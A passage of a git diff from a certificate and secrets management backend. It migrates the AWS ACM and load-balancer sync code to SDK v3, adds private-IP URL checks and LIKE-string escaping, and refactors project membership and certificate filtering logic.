DeleteCertificateCommand({ CertificateArn: certificateArn })), { operation, syncId }); @@ -256,31 +271,40 @@ export const awsCertificateManagerPkiSyncFactory = ({ } }; const $getAwsAcmCertificates = async ( - acm: ACM, + acm: ACMClient, syncId = "unknown" ): Promise<{ acmCertificates: Record< string, - { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: ACM.TagList } + { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: Tag[] } >; }> => { const paginateAwsAcmCertificates = async () => { - const certificates: ACM.CertificateSummary[] = []; + const certificates: CertificateSummary[] = []; let nextToken: string | undefined; do { - const listParams: ACM.ListCertificatesRequest = { + // By default, listCertificates only returns RSA_1024 and RSA_2048 certificates. + const keyTypes: KeyAlgorithm[] = [ + "RSA_1024", + "RSA_2048", + "RSA_3072", + "RSA_4096", + "EC_prime256v1", + "EC_secp384r1", + "EC_secp521r1" + ]; + const listParams: ListCertificatesCommandInput = { CertificateStatuses: ["ISSUED"], NextToken: nextToken, MaxItems: 100, - // By default, listCertificates only returns RSA_1024 and RSA_2048 certificates. // We must explicitly include all key types to get all certificates. Includes: { - keyTypes: ["RSA_1024", "RSA_2048", "RSA_3072", "RSA_4096", "EC_prime256v1", "EC_secp384r1", "EC_secp521r1"] + keyTypes } }; - const response = await withRateLimitRetry(() => acm.listCertificates(listParams).promise(), { + const response = await withRateLimitRetry(() => acm.send(new ListCertificatesCommand(listParams)), { operation: "list-certificates", syncId }); @@ -304,14 +328,16 @@ export const awsCertificateManagerPkiSyncFactory = ({ } const [certificateDetails, tagsResponse] = await Promise.all([ - acm.describeCertificate({ CertificateArn: certSummary.CertificateArn }).promise(), - acm.listTagsForCertificate({ CertificateArn: certSummary.CertificateArn }).promise() + acm.send(new DescribeCertificateCommand({ CertificateArn: certSummary.CertificateArn })), + acm.send(new ListTagsForCertificateCommand({ CertificateArn: certSummary.CertificateArn })) ]); - let certificateContent: ACM.GetCertificateResponse | undefined; + let certificateContent: GetCertificateCommandOutput | undefined; if (!shouldSkipCertificateExport(certSummary)) { try { - certificateContent = await acm.getCertificate({ CertificateArn: certSummary.CertificateArn }).promise(); + certificateContent = await acm.send( + new GetCertificateCommand({ CertificateArn: certSummary.CertificateArn }) + ); } catch (error) { // Certificate content cannot be imported } @@ -351,7 +377,7 @@ export const awsCertificateManagerPkiSyncFactory = ({ const res: Record< string, - { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: ACM.TagList } + { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: Tag[] } > = successfulCertificates.reduce( (obj, certificate) => ({ ...obj, @@ -363,10 +389,7 @@ export const awsCertificateManagerPkiSyncFactory = ({ Tags: certificate.Tags } }), - {} as Record< - string, - { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: ACM.TagList } - > + {} as Record ); return { @@ -391,7 +414,7 @@ export const awsCertificateManagerPkiSyncFactory = ({ }: { acmCertificates: Record< string, - { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: ACM.TagList } + { cert: string; privateKey: string; certificateChain?: string; arn?: string; Tags?: Tag[] } >; } = await $getAwsAcmCertificates(acm, pkiSync.id); @@ -568,9 +591,9 @@ export const awsCertificateManagerPkiSyncFactory = ({ setCertificates, async ({ key, name, cert, privateKey, certificateChain, existingArn, certificateId }) => { try { - const importParams: ACM.ImportCertificateRequest = { - Certificate: cert, - PrivateKey: privateKey + const importParams: ImportCertificateCommandInput = { + Certificate: Buffer.from(cert), + PrivateKey: Buffer.from(privateKey) }; if (!existingArn) { @@ -583,13 +606,13 @@ export const awsCertificateManagerPkiSyncFactory = ({ } if (certificateChain && certificateChain.trim().length > 0) { - importParams.CertificateChain = certificateChain; + importParams.CertificateChain = Buffer.from(certificateChain); } if (existingArn) { importParams.CertificateArn = existingArn; } - const response = await withRateLimitRetry(() => acm.importCertificate(importParams).promise(), { + const response = await withRateLimitRetry(() => acm.send(new ImportCertificateCommand(importParams)), { operation: "import-certificate", syncId: pkiSync.id }); @@ -603,8 +626,8 @@ export const awsCertificateManagerPkiSyncFactory = ({ await withRateLimitRetry( () => - acm - .addTagsToCertificate({ + acm.send( + new AddTagsToCertificateCommand({ CertificateArn: response.CertificateArn!, Tags: [ { @@ -613,7 +636,7 @@ export const awsCertificateManagerPkiSyncFactory = ({ } ] }) - .promise(), + ), { operation: "add-tags-to-certificate", syncId: pkiSync.id diff --git a/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-types.ts b/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-types.ts index b90915be3de..57c1519a825 100644 --- a/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-types.ts +++ b/backend/src/services/pki-sync/aws-certificate-manager/aws-certificate-manager-pki-sync-types.ts @@ -1,4 +1,4 @@ -import ACM from "aws-sdk/clients/acm.js"; +import { type CertificateDetail, type Tag } from "@aws-sdk/client-acm"; import { z } from "zod"; import { TAwsConnection } from "@app/services/app-connection/aws/aws-connection-types"; @@ -22,8 +22,8 @@ export type TAwsCertificateManagerPkiSyncWithCredentials = TAwsCertificateManage connection: TAwsConnection; }; -export interface ACMCertificateWithKey extends ACM.CertificateDetail { - Tags?: ACM.TagList; +export interface ACMCertificateWithKey extends CertificateDetail { + Tags?: Tag[]; key: string; cert: string; certificateChain: string; diff --git a/backend/src/services/pki-sync/aws-elastic-load-balancer/aws-elastic-load-balancer-pki-sync-fns.ts b/backend/src/services/pki-sync/aws-elastic-load-balancer/aws-elastic-load-balancer-pki-sync-fns.ts index 40b49c92139..bffc522a225 100644 --- a/backend/src/services/pki-sync/aws-elastic-load-balancer/aws-elastic-load-balancer-pki-sync-fns.ts +++ b/backend/src/services/pki-sync/aws-elastic-load-balancer/aws-elastic-load-balancer-pki-sync-fns.ts @@ -1,6 +1,12 @@ /* eslint-disable no-await-in-loop */ -import ACM from "aws-sdk/clients/acm.js"; -import ELBv2 from "aws-sdk/clients/elbv2.js"; +import { ACMClient, DeleteCertificateCommand } from "@aws-sdk/client-acm"; +import { + AddListenerCertificatesCommand, + DescribeListenerCertificatesCommand, + ElasticLoadBalancingV2Client, + ModifyListenerCommand, + RemoveListenerCertificatesCommand +} from "@aws-sdk/client-elastic-load-balancing-v2"; import { z } from "zod"; import { TCertificateSyncs } from "@app/db/schemas"; @@ -70,7 +76,7 @@ const getAwsElbClient = async ( region: AWSRegion, appConnectionDAL: Pick, kmsService: Pick -): Promise => { +): Promise => { const appConnection = await appConnectionDAL.findById(connectionId); if (!appConnection) { @@ -116,7 +122,7 @@ const getAwsElbClient = async ( const awsConfig = await getAwsConnectionConfig(awsConnectionConfig, region); - return new ELBv2(awsConfig); + return new ElasticLoadBalancingV2Client(awsConfig); }; const getAwsAcmClient = async ( @@ -124,7 +130,7 @@ const getAwsAcmClient = async ( region: AWSRegion, appConnectionDAL: Pick, kmsService: Pick -): Promise => { +): Promise => { const appConnection = await appConnectionDAL.findById(connectionId); if (!appConnection) { @@ -170,7 +176,7 @@ const getAwsAcmClient = async ( const awsConfig = await getAwsConnectionConfig(awsConnectionConfig, region); - return new ACM(awsConfig); + return new ACMClient(awsConfig); }; export const awsElasticLoadBalancerPkiSyncFactory = ({ @@ -187,14 +193,14 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ }); const attachCertificateToListener = async ( - elbClient: ELBv2, + elbClient: ElasticLoadBalancingV2Client, listenerArn: string, certificateArn: string, setAsDefault: boolean, syncId: string ): Promise => { const listenerCertsResponse = await withRateLimitRetry( - () => elbClient.describeListenerCertificates({ ListenerArn: listenerArn }).promise(), + () => elbClient.send(new DescribeListenerCertificatesCommand({ ListenerArn: listenerArn })), { operation: "describe-listener-certificates", syncId } ); @@ -206,9 +212,12 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ if (!isAlreadyAttached) { await withRateLimitRetry( () => - elbClient - .addListenerCertificates({ ListenerArn: listenerArn, Certificates: [{ CertificateArn: certificateArn }] }) - .promise(), + elbClient.send( + new AddListenerCertificatesCommand({ + ListenerArn: listenerArn, + Certificates: [{ CertificateArn: certificateArn }] + }) + ), { operation: "add-listener-certificates", syncId } ); } @@ -216,25 +225,28 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ if (setAsDefault && !isAlreadyDefault) { await withRateLimitRetry( () => - elbClient - .modifyListener({ ListenerArn: listenerArn, Certificates: [{ CertificateArn: certificateArn }] }) - .promise(), + elbClient.send( + new ModifyListenerCommand({ ListenerArn: listenerArn, Certificates: [{ CertificateArn: certificateArn }] }) + ), { operation: "modify-listener", syncId } ); } }; const removeCertificateFromListener = async ( - elbClient: ELBv2, + elbClient: ElasticLoadBalancingV2Client, listenerArn: string, certificateArn: string, syncId: string ): Promise => { await withRateLimitRetry( () => - elbClient - .removeListenerCertificates({ ListenerArn: listenerArn, Certificates: [{ CertificateArn: certificateArn }] }) - .promise(), + elbClient.send( + new RemoveListenerCertificatesCommand({ + ListenerArn: listenerArn, + Certificates: [{ CertificateArn: certificateArn }] + }) + ), { operation: "remove-listener-certificates", syncId } ); }; @@ -354,7 +366,7 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ for (const listener of listeners) { try { const response = await withRateLimitRetry( - () => elbClient.describeListenerCertificates({ ListenerArn: listener.listenerArn }).promise(), + () => elbClient.send(new DescribeListenerCertificatesCommand({ ListenerArn: listener.listenerArn })), { operation: "describe-listener-certificates-for-cleanup", syncId: pkiSync.id } ); const defaultCert = response.Certificates?.find((c) => c.IsDefault); @@ -397,7 +409,7 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ // Remove from ACM try { await withRateLimitRetry( - () => acmClient.deleteCertificate({ CertificateArn: certificateArn }).promise(), + () => acmClient.send(new DeleteCertificateCommand({ CertificateArn: certificateArn })), { operation: "delete-orphaned-certificate", syncId: pkiSync.id @@ -492,10 +504,13 @@ export const awsElasticLoadBalancerPkiSyncFactory = ({ // Remove from ACM try { - await withRateLimitRetry(() => acmClient.deleteCertificate({ CertificateArn: certificateArn }).promise(), { - operation: "delete-certificate", - syncId: pkiSync.id - }); + await withRateLimitRetry( + () => acmClient.send(new DeleteCertificateCommand({ CertificateArn: certificateArn })), + { + operation: "delete-certificate", + syncId: pkiSync.id + } + ); await certificateSyncDAL.removeCertificates(pkiSync.id, [certificateId]); removedCount += 1; } catch (error) { diff --git a/backend/src/services/pki-sync/azure-key-vault/azure-key-vault-pki-sync-fns.ts b/backend/src/services/pki-sync/azure-key-vault/azure-key-vault-pki-sync-fns.ts index 390a08098cd..6b14475481d 100644 --- a/backend/src/services/pki-sync/azure-key-vault/azure-key-vault-pki-sync-fns.ts +++ b/backend/src/services/pki-sync/azure-key-vault/azure-key-vault-pki-sync-fns.ts @@ -5,6 +5,7 @@ import * as crypto from "crypto"; import { TCertificateSyncs } from "@app/db/schemas"; import { request } from "@app/lib/config/request"; import { logger } from "@app/lib/logger"; +import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator"; import { TAppConnectionDALFactory } from "@app/services/app-connection/app-connection-dal"; import { getAzureConnectionAccessToken } from "@app/services/app-connection/azure-key-vault/azure-key-vault-connection-fns"; import { TCertificateDALFactory } from "@app/services/certificate/certificate-dal"; @@ -211,6 +212,8 @@ export const azureKeyVaultPkiSyncFactory = ({ certificateDAL }: TAzureKeyVaultPkiSyncFactoryDeps) => { const $getAzureKeyVaultCertificates = async (accessToken: string, vaultBaseUrl: string, syncId = "unknown") => { + await blockLocalAndPrivateIpAddresses(vaultBaseUrl); + const paginateAzureKeyVaultCertificates = async () => { let result: GetAzureKeyVaultCertificate[] = []; @@ -218,6 +221,7 @@ export const azureKeyVaultPkiSyncFactory = ({ while (currentUrl) { const urlToFetch = currentUrl; // Capture current URL to avoid loop function issue + await blockLocalAndPrivateIpAddresses(urlToFetch); const res = await withRateLimitRetry( () => request.get<{ value: GetAzureKeyVaultCertificate[]; nextLink: string }>(urlToFetch, { @@ -248,14 +252,13 @@ export const azureKeyVaultPkiSyncFactory = ({ const certificateResults = await executeWithConcurrencyLimit( enabledAzureKeyVaultCertificates, async (getAzureKeyVaultCertificate) => { - const azureKeyVaultCertificate = await request.get( - `${getAzureKeyVaultCertificate.id}?api-version=7.4`, - { - headers: { - Authorization: `Bearer ${accessToken}` - } + const certificateDetailUrl = `${getAzureKeyVaultCertificate.id}?api-version=7.4`; + await blockLocalAndPrivateIpAddresses(certificateDetailUrl); + const azureKeyVaultCertificate = await request.get(certificateDetailUrl, { + headers: { + Authorization: `Bearer ${accessToken}` } - ); + }); let certPem = ""; if (azureKeyVaultCertificate.data.cer) { @@ -733,6 +736,8 @@ export const azureKeyVaultPkiSyncFactory = ({ // Cast destination config to Azure Key Vault config const destinationConfig = pkiSync.destinationConfig as TAzureKeyVaultPkiSyncConfig; + await blockLocalAndPrivateIpAddresses(destinationConfig.vaultBaseUrl); + const existingSyncRecords = await certificateSyncDAL.findByPkiSyncId(pkiSync.id); const certificateNamesToRemove: string[] = []; const certificateIdToNameMap = new Map(); diff --git a/backend/src/services/project-bot/project-bot-dal.ts b/backend/src/services/project-bot/project-bot-dal.ts index 2f1863ad6d3..be4dfce79bf 100644 --- a/backend/src/services/project-bot/project-bot-dal.ts +++ b/backend/src/services/project-bot/project-bot-dal.ts @@ -51,12 +51,12 @@ export const projectBotDALFactory = (db: TDbClient) => { .join(TableName.Users, `${TableName.Membership}.actorUserId`, `${TableName.Users}.id`) .join(TableName.ProjectKeys, `${TableName.Membership}.actorUserId`, `${TableName.ProjectKeys}.receiverId`) .where(`${TableName.ProjectKeys}.projectId` as "projectId", projectId) - .join( + .leftJoin( TableName.UserEncryptionKey, `${TableName.UserEncryptionKey}.userId`, `${TableName.Users}.id` ) - .join( + .leftJoin( db(TableName.UserEncryptionKey).as("senderUserEncryption"), `${TableName.ProjectKeys}.senderId`, `senderUserEncryption.userId` diff --git a/backend/src/services/project-env/project-env-service.ts b/backend/src/services/project-env/project-env-service.ts index c402b603027..8b7a6cae431 100644 --- a/backend/src/services/project-env/project-env-service.ts +++ b/backend/src/services/project-env/project-env-service.ts @@ -6,11 +6,10 @@ import { TLicenseServiceFactory } from "@app/ee/services/license/license-service import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; import { ProjectPermissionActions, ProjectPermissionSub } from "@app/ee/services/permission/project-permission"; import { TSecretApprovalPolicyEnvironmentDALFactory } from "@app/ee/services/secret-approval-policy/secret-approval-policy-environment-dal"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { logger } from "@app/lib/logger"; -import { TProjectDALFactory } from "../project/project-dal"; import { TSecretFolderDALFactory } from "../secret-folder/secret-folder-dal"; import { TProjectEnvDALFactory } from "./project-env-dal"; import { TCreateEnvDTO, TDeleteEnvDTO, TGetEnvDTO, TUpdateEnvDTO } from "./project-env-types"; @@ -18,7 +17,6 @@ import { TCreateEnvDTO, TDeleteEnvDTO, TGetEnvDTO, TUpdateEnvDTO } from "./proje type TProjectEnvServiceFactoryDep = { projectEnvDAL: TProjectEnvDALFactory; folderDAL: Pick; - projectDAL: Pick; permissionService: Pick; licenseService: Pick; keyStore: Pick; @@ -33,7 +31,6 @@ export const projectEnvServiceFactory = ({ permissionService, licenseService, keyStore, - projectDAL, folderDAL, accessApprovalPolicyEnvironmentDAL, secretApprovalPolicyEnvironmentDAL @@ -80,8 +77,9 @@ export const projectEnvServiceFactory = ({ name: "CreateEnvironment" }); - const project = await projectDAL.findById(projectId); - const plan = await licenseService.getPlan(project.orgId); + // getProjectPermission above guarantees project existence and org membership, + // so actorOrgId === project.orgId β€” no separate project lookup needed. + const plan = await licenseService.getPlan(actorOrgId); if (plan.environmentLimit !== null && envs.length >= plan.environmentLimit) { // case: limit imposed on number of environments allowed // case: number of environments used exceeds the number of environments allowed @@ -116,7 +114,7 @@ export const projectEnvServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.WaitUntilReadyProjectEnvironmentOperation(projectId), - 10, + KeyStoreTtls.ProjectEnvironmentOperationMarkerInSeconds, "true" ); @@ -178,8 +176,9 @@ export const projectEnvServiceFactory = ({ } const envs = await projectEnvDAL.find({ projectId }); - const project = await projectDAL.findById(projectId); - const plan = await licenseService.getPlan(project.orgId); + // getProjectPermission above guarantees project existence and org membership, + // so actorOrgId === project.orgId β€” no separate project lookup needed. + const plan = await licenseService.getPlan(actorOrgId); if (plan.environmentLimit !== null && envs.length > plan.environmentLimit) { // case: limit imposed on number of environments allowed // case: number of environments used exceeds the number of environments allowed @@ -202,7 +201,7 @@ export const projectEnvServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.WaitUntilReadyProjectEnvironmentOperation(projectId), - 10, + KeyStoreTtls.ProjectEnvironmentOperationMarkerInSeconds, "true" ); @@ -264,7 +263,7 @@ export const projectEnvServiceFactory = ({ await keyStore.setItemWithExpiry( KeyStorePrefixes.WaitUntilReadyProjectEnvironmentOperation(projectId), - 10, + KeyStoreTtls.ProjectEnvironmentOperationMarkerInSeconds, "true" ); diff --git a/backend/src/services/project-key/project-key-dal.ts b/backend/src/services/project-key/project-key-dal.ts index 07d061e9549..54cb949745d 100644 --- a/backend/src/services/project-key/project-key-dal.ts +++ b/backend/src/services/project-key/project-key-dal.ts @@ -18,7 +18,7 @@ export const projectKeyDALFactory = (db: TDbClient) => { try { const projectKey = await (tx || db.replicaNode())(TableName.ProjectKeys) .join(TableName.Users, `${TableName.ProjectKeys}.senderId`, `${TableName.Users}.id`) - .join(TableName.UserEncryptionKey, `${TableName.UserEncryptionKey}.userId`, `${TableName.Users}.id`) + .leftJoin(TableName.UserEncryptionKey, `${TableName.UserEncryptionKey}.userId`, `${TableName.Users}.id`) .where({ projectId, receiverId: userId }) .orderBy("createdAt", "desc", "last") .select(selectAllTableCols(TableName.ProjectKeys)) @@ -38,7 +38,7 @@ export const projectKeyDALFactory = (db: TDbClient) => { .where(`${TableName.Membership}.scopeProjectId` as "scopeProjectId", projectId) .where(`${TableName.Membership}.scope`, AccessScope.Project) .join(TableName.Users, `${TableName.Membership}.actorUserId`, `${TableName.Users}.id`) - .join(TableName.UserEncryptionKey, `${TableName.Users}.id`, `${TableName.UserEncryptionKey}.userId`) + .leftJoin(TableName.UserEncryptionKey, `${TableName.Users}.id`, `${TableName.UserEncryptionKey}.userId`) .select(db.ref("userId").withSchema(TableName.Users), "publicKey"); return pubKeys; } catch (error) { diff --git a/backend/src/services/project-membership/project-membership-dal.ts b/backend/src/services/project-membership/project-membership-dal.ts index b2e51bedd38..87c6f4c9eee 100644 --- a/backend/src/services/project-membership/project-membership-dal.ts +++ b/backend/src/services/project-membership/project-membership-dal.ts @@ -305,7 +305,7 @@ export const projectMembershipDALFactory = (db: TDbClient) => { .join(TableName.Users, `${TableName.Membership}.actorUserId`, `${TableName.Users}.id`) .whereIn(`${TableName.Users}.id`, userIds) .where(`${TableName.Project}.orgId`, orgId) - .join( + .leftJoin( TableName.UserEncryptionKey, `${TableName.UserEncryptionKey}.userId`, `${TableName.Users}.id` diff --git a/backend/src/services/project-membership/project-membership-service.ts b/backend/src/services/project-membership/project-membership-service.ts index 256bed87a91..14d27851ebd 100644 --- a/backend/src/services/project-membership/project-membership-service.ts +++ b/backend/src/services/project-membership/project-membership-service.ts @@ -8,6 +8,8 @@ import { ProjectPermissionMemberActions, ProjectPermissionSub } from "@app/ee/se import { getConfig } from "@app/lib/config/env"; import { BadRequestError, NotFoundError } from "@app/lib/errors"; import { groupBy } from "@app/lib/fn"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TAccessApprovalPolicyApproverDALFactory } from "../../ee/services/access-approval-policy/access-approval-policy-approver-dal"; import { TAccessApprovalPolicyDALFactory } from "../../ee/services/access-approval-policy/access-approval-policy-dal"; @@ -36,10 +38,7 @@ import { } from "./project-membership-types"; type TProjectMembershipServiceFactoryDep = { - permissionService: Pick< - TPermissionServiceFactory, - "getProjectPermission" | "getProjectPermissionByRoles" | "invalidateProjectPermissionCache" - >; + permissionService: Pick; smtpService: TSmtpService; projectMembershipDAL: TProjectMembershipDALFactory; membershipUserDAL: TMembershipUserDALFactory; @@ -198,9 +197,6 @@ export const projectMembershipServiceFactory = ({ members, sendEmails = true }: TAddUsersToWorkspaceDTO) => { - const project = await projectDAL.findById(projectId); - if (!project) throw new NotFoundError({ message: `Project with ID '${projectId}' not found` }); - const { permission } = await permissionService.getProjectPermission({ actor, actorId, @@ -210,8 +206,11 @@ export const projectMembershipServiceFactory = ({ actionProjectType: ActionProjectType.Any }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionMemberActions.Create, ProjectPermissionSub.Member); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); const orgMembers = await membershipUserDAL.find({ - [`${TableName.Membership}.scopeOrgId` as "scopeOrgId"]: project.orgId, + [`${TableName.Membership}.scopeOrgId` as "scopeOrgId"]: actorOrgId, scope: AccessScope.Organization, $in: { [`${TableName.Membership}.id` as "id"]: members.map(({ orgMembershipId }) => orgMembershipId) @@ -245,7 +244,7 @@ export const projectMembershipServiceFactory = ({ scopeProjectId: projectId, actorUserId, scope: AccessScope.Project, - scopeOrgId: project.orgId + scopeOrgId: actorOrgId })), tx ); @@ -268,13 +267,11 @@ export const projectMembershipServiceFactory = ({ ); }); - await permissionService.invalidateProjectPermissionCache(projectId); - if (sendEmails) { await notificationService.createUserNotifications( orgMembershipUsernames.map((member) => ({ userId: member.id, - orgId: project.orgId, + orgId: actorOrgId, type: NotificationType.PROJECT_INVITATION, title: "Project Invitation", body: `You've been invited to join the project **${project.name}**.` @@ -314,14 +311,6 @@ export const projectMembershipServiceFactory = ({ }); ForbiddenError.from(permission).throwUnlessCan(ProjectPermissionMemberActions.Delete, ProjectPermissionSub.Member); - const project = await projectDAL.findById(projectId); - - if (!project) { - throw new NotFoundError({ - message: `Project with ID '${projectId}' not found` - }); - } - const usernamesAndEmails = [...emails, ...usernames]; const projectMembers = await projectMembershipDAL.findMembershipsByUsername(projectId, [ @@ -400,8 +389,6 @@ export const projectMembershipServiceFactory = ({ return deletedMemberships; }); - await permissionService.invalidateProjectPermissionCache(projectId); - return memberships; }; @@ -410,7 +397,9 @@ export const projectMembershipServiceFactory = ({ throw new BadRequestError({ message: "Only users can leave projects" }); } - const project = await projectDAL.findById(projectId); + const project = await requestMemoize(requestMemoKeys.projectFindById(projectId), () => + projectDAL.findById(projectId) + ); if (!project) throw new NotFoundError({ message: `Project with ID '${projectId}' not found` }); if (project.version === ProjectVersion.V1) { diff --git a/backend/src/services/project-role/project-role-fns.ts b/backend/src/services/project-role/project-role-fns.ts index 4dfcf960b70..f8157acbe13 100644 --- a/backend/src/services/project-role/project-role-fns.ts +++ b/backend/src/services/project-role/project-role-fns.ts @@ -26,7 +26,7 @@ export const getPredefinedRoles = ({ projectId, projectType, roleFilter }: TGetP { id: uuidv4(), projectId, - name: "Developer", + name: "Member", slug: ProjectMembershipRole.Member, permissions: projectMemberPermissions, description: "Limited read/write role in a project", diff --git a/backend/src/services/project/project-dal.ts b/backend/src/services/project/project-dal.ts index d491af4c8c1..fd02d98d2f6 100644 --- a/backend/src/services/project/project-dal.ts +++ b/backend/src/services/project/project-dal.ts @@ -13,6 +13,7 @@ import { TProjectsUpdate } from "@app/db/schemas"; import { BadRequestError, DatabaseError, NotFoundError, UnauthorizedError } from "@app/lib/errors"; +import { sanitizeSqlLikeString } from "@app/lib/fn"; import { buildFindFilter, ormify, selectAllTableCols, sqlNestRelationships } from "@app/lib/knex"; import { ActorType } from "../auth/auth-type"; @@ -414,7 +415,7 @@ export const projectDALFactory = (db: TDbClient) => { void query.where(`${TableName.Project}.type`, dto.type); } if (dto.name) { - void query.whereILike(`${TableName.Project}.name`, `%${dto.name}%`); + void query.whereILike(`${TableName.Project}.name`, `%${sanitizeSqlLikeString(dto.name)}%`); } if (dto.projectIds?.length) { diff --git a/backend/src/services/project/project-service.ts b/backend/src/services/project/project-service.ts index e46e7421320..0694687c9c4 100644 --- a/backend/src/services/project/project-service.ts +++ b/backend/src/services/project/project-service.ts @@ -40,7 +40,8 @@ import { TSshCertificateDALFactory } from "@app/ee/services/ssh-certificate/ssh- import { TSshCertificateTemplateDALFactory } from "@app/ee/services/ssh-certificate-template/ssh-certificate-template-dal"; import { TSshHostDALFactory } from "@app/ee/services/ssh-host/ssh-host-dal"; import { TSshHostGroupDALFactory } from "@app/ee/services/ssh-host-group/ssh-host-group-dal"; -import { KeyStorePrefixes, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, PgSqlLock, TKeyStoreFactory } from "@app/keystore/keystore"; +import { withCache } from "@app/lib/cache/with-cache"; import { getProcessedPermissionRules } from "@app/lib/casl/permission-filter-utils"; import { getConfig } from "@app/lib/config/env"; import { crypto } from "@app/lib/crypto/cryptography"; @@ -48,6 +49,8 @@ import { DatabaseErrorCode } from "@app/lib/error-codes"; import { BadRequestError, DatabaseError, ForbiddenRequestError, NotFoundError } from "@app/lib/errors"; import { groupBy } from "@app/lib/fn"; import { alphaNumericNanoId } from "@app/lib/nanoid"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { TProjectPermission } from "@app/lib/types"; import { TPkiSubscriberDALFactory } from "@app/services/pki-subscriber/pki-subscriber-dal"; @@ -91,6 +94,8 @@ import { TCreateProjectDTO, TDeleteProjectDTO, TDeleteProjectWorkflowIntegration, + TGetActivityTrendDTO, + TGetDashboardStatsDTO, TGetProjectDTO, TGetProjectKmsKey, TGetProjectSshConfig, @@ -162,6 +167,9 @@ type TProjectServiceFactoryDep = { | "findWithPrivateKeyInfo" | "findActiveCertificatesForSync" | "countActiveCertificatesForSync" + | "getDashboardStats" + | "getActivityTrend" + | "getPqcTrend" >; certificateTemplateDAL: Pick; pkiAlertDAL: Pick; @@ -176,7 +184,7 @@ type TProjectServiceFactoryDep = { licenseService: Pick; smtpService: Pick; orgDAL: Pick; - keyStore: Pick; + keyStore: Pick; roleDAL: Pick; kmsService: Pick< TKmsServiceFactory, @@ -717,7 +725,7 @@ export const projectServiceFactory = ({ }; }); - await keyStore.deleteItem(`infisical-cloud-plan-${actorOrgId}`); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(actorOrgId)); return results; }; @@ -791,7 +799,7 @@ export const projectServiceFactory = ({ return delProject; }); - await keyStore.deleteItem(`infisical-cloud-plan-${actorOrgId}`); + await keyStore.deleteItem(KeyStorePrefixes.LicenseCloudPlan(actorOrgId)); return deletedProject; } finally { await lock.release(); @@ -1212,6 +1220,18 @@ export const projectServiceFactory = ({ toDate, metadataFilter, extendedKeyUsage, + keyAlgorithm, + signatureAlgorithm, + keySizes, + caIds, + enrollmentTypes, + source, + notAfterFrom, + notAfterTo, + notBeforeFrom, + notBeforeTo, + sortBy, + sortOrder, actorId, actorOrgId, actorAuthMethod, @@ -1240,12 +1260,24 @@ export const projectServiceFactory = ({ ...(friendlyName && { friendlyName }), ...(commonName && { commonName }), ...(search && { search }), - ...(status && { status: Array.isArray(status) ? status[0] : status }), + ...(status && { + status: Array.isArray(status) ? status : status.split(",").map((s) => s.trim()) + }), ...(profileIds && { profileIds }), ...(fromDate && { fromDate }), ...(toDate && { toDate }), ...(metadataFilter && { metadataFilter }), - ...(extendedKeyUsage && { extendedKeyUsage }) + ...(extendedKeyUsage && { extendedKeyUsage }), + ...(keyAlgorithm && { keyAlgorithm }), + ...(signatureAlgorithm && { signatureAlgorithm }), + ...(keySizes && keySizes.length > 0 && { keySizes }), + ...(caIds && { caIds }), + ...(enrollmentTypes && { enrollmentTypes }), + ...(source && { source }), + ...(notAfterFrom && { notAfterFrom }), + ...(notAfterTo && { notAfterTo }), + ...(notBeforeFrom && { notBeforeFrom }), + ...(notBeforeTo && { notBeforeTo }) }; const permissionFilters = getProcessedPermissionRules( permission, @@ -1253,6 +1285,18 @@ export const projectServiceFactory = ({ ProjectPermissionSub.Certificates ); + const ALLOWED_SORT_COLUMNS = new Set([ + "notAfter", + "notBefore", + "createdAt", + "commonName", + "serialNumber", + "keyAlgorithm", + "status" + ]); + const validatedSortBy = sortBy && ALLOWED_SORT_COLUMNS.has(sortBy) ? sortBy : "notAfter"; + const validatedSortOrder = sortOrder === "asc" ? "asc" : "desc"; + const certificates = forPkiSync ? await certificateDAL.findActiveCertificatesForSync(regularFilters, { offset, limit }, permissionFilters) : await certificateDAL.findWithPrivateKeyInfo( @@ -1260,7 +1304,7 @@ export const projectServiceFactory = ({ { offset, limit, - sort: [["notAfter", "desc"]] + sort: [[validatedSortBy, validatedSortOrder]] }, permissionFilters ); @@ -1270,17 +1314,27 @@ export const projectServiceFactory = ({ ...(regularFilters.friendlyName && { friendlyName: String(regularFilters.friendlyName) }), ...(regularFilters.commonName && { commonName: String(regularFilters.commonName) }), ...(regularFilters.search && { search: String(regularFilters.search) }), - ...(regularFilters.status && { status: String(regularFilters.status) }), + ...(regularFilters.status && { status: regularFilters.status }), ...(regularFilters.profileIds && { profileIds: regularFilters.profileIds }), ...(regularFilters.fromDate && { fromDate: regularFilters.fromDate }), ...(regularFilters.toDate && { toDate: regularFilters.toDate }), ...(regularFilters.metadataFilter && { metadataFilter: regularFilters.metadataFilter }), - ...(regularFilters.extendedKeyUsage && { extendedKeyUsage: String(regularFilters.extendedKeyUsage) }) + ...(regularFilters.extendedKeyUsage && { extendedKeyUsage: 